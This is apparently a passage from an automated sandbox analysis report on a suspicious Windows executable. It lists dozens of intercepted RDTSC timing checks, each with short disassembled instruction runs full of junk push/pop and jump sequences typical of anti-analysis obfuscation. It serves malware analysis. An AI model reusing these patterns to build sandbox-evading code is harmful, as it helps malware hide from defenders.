                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF060 second address: 3CF06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1C4 second address: 3CF1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F29FC524576h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1D2 second address: 3CF1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1D8 second address: 3CF1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1DD second address: 3CF1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1E2 second address: 3CF1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29FC524576h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1EE second address: 3CF1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1F4 second address: 3CF229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29FC524583h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC524588h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BB2 second address: 3D3BC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F29FC6B5C96h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BC0 second address: 3D3BC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BC6 second address: 3D3BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F29FC6B5C9Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D3BDE second address: 3D3BE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3CD second address: 3DB3D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3D6 second address: 3DB3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB3DF second address: 3DB408 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC6B5CA7h 0x00000008 push edx 0x00000009 jns 00007F29FC6B5C96h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DB408 second address: 3DB411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D96D9 second address: 3D96E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9828 second address: 3D9830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9FC7 second address: 3D9FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F29FC6B5CA4h 0x0000000b jmp 00007F29FC6B5C9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F29FC6B5C96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D9FE8 second address: 3D9FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA14B second address: 3DA15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA15A second address: 3DA161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA161 second address: 3DA167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA467 second address: 3DA477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA477 second address: 3DA48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F29FC6B5C9Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3DA48B second address: 3DA49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29FC52457Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92BA second address: 3D92F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F29FC6B5C96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29FC6B5CA1h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F29FC6B5CA9h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92F7 second address: 3D92FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3D92FB second address: 3D9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E24E9 second address: 3E2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC524581h 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E2501 second address: 3E2527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29FC6B5C96h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F29FC6B5C96h 0x00000013 jmp 00007F29FC6B5CA3h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E2527 second address: 3E252B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E21F1 second address: 3E21FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3E21FF second address: 3E2203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3EE21E second address: 3EE222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F3188 second address: 3F3192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D7C second address: 3F6D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D82 second address: 3F6D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F29FC524576h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3F6D92 second address: 3F6D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 404367 second address: 40436D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40436D second address: 404396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F29FC6B5CA8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 404396 second address: 40439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40439A second address: 4043AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069CA second address: 4069D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069D0 second address: 4069D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4069D8 second address: 4069E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FC524576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0AC second address: 31F0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0B5 second address: 31F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0BF second address: 31F0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0C3 second address: 31F0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29FC524576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31F0CF second address: 31F0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F29FC6B5CA0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D2BE second address: 40D2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC52457Fh 0x00000009 jl 00007F29FC524576h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D5A7 second address: 40D5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D5AB second address: 40D5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F29FC52457Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D72E second address: 40D736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 40D892 second address: 40D8E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F29FC524576h 0x00000009 jmp 00007F29FC524584h 0x0000000e jmp 00007F29FC524580h 0x00000013 jmp 00007F29FC524585h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F29FC52457Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4137DD second address: 4137F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F29FC6B5C96h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4137F5 second address: 4137FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413940 second address: 41394E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F29FC6B5C96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 41394E second address: 413952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413952 second address: 413958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 413958 second address: 413965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F29FC524576h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F7ED second address: 42F7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F7F3 second address: 42F7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F66A second address: 42F686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F29FC6B5C96h 0x0000000a jmp 00007F29FC6B5CA0h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 42F686 second address: 42F68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432EFE second address: 432F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432F0A second address: 432F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4329D0 second address: 432A1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F29FC6B5CA6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F29FC6B5CA7h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F29FC6B5C9Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A1B second address: 432A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A1F second address: 432A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5CA3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A4B second address: 432A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 432A5A second address: 432A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F29FC6B5C96h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 32798A second address: 3279AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F29FC524576h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F29FC524583h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489B3 second address: 4489B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489B7 second address: 4489CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC52457Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4489CA second address: 4489D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44B62D second address: 44B63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44B63B second address: 44B640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44BB4F second address: 44BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F29FC524578h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9DA second address: 44E9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9E0 second address: 44E9E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 44E9E4 second address: 44EA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F29FC6B5CA2h 0x0000000e jno 00007F29FC6B5C96h 0x00000014 jng 00007F29FC6B5C96h 0x0000001a jc 00007F29FC6B5C9Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 4504EC second address: 4504F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36A676 second address: 36A67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03BD second address: 52E03C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03C3 second address: 52E03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03C7 second address: 52E03CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E03CB second address: 52E0416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F29FC6B5C9Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F29FC6B5CA0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F29FC6B5CA0h 0x0000001b mov edx, dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F29FC6B5C9Ah 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52E0416 second address: 52E0425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53006C1 second address: 5300720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F29FC6B5CA0h 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F29FC6B5CA0h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ecx, 4FB69E7Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F29FC6B5CA8h 0x00000027 sbb cl, FFFFFF88h 0x0000002a jmp 00007F29FC6B5C9Bh 0x0000002f popfd 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300720 second address: 530075A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524588h 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007F29FC52457Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 764C5E56h 0x0000001d mov ax, di 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530075A second address: 530076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5C9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530076D second address: 5300771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
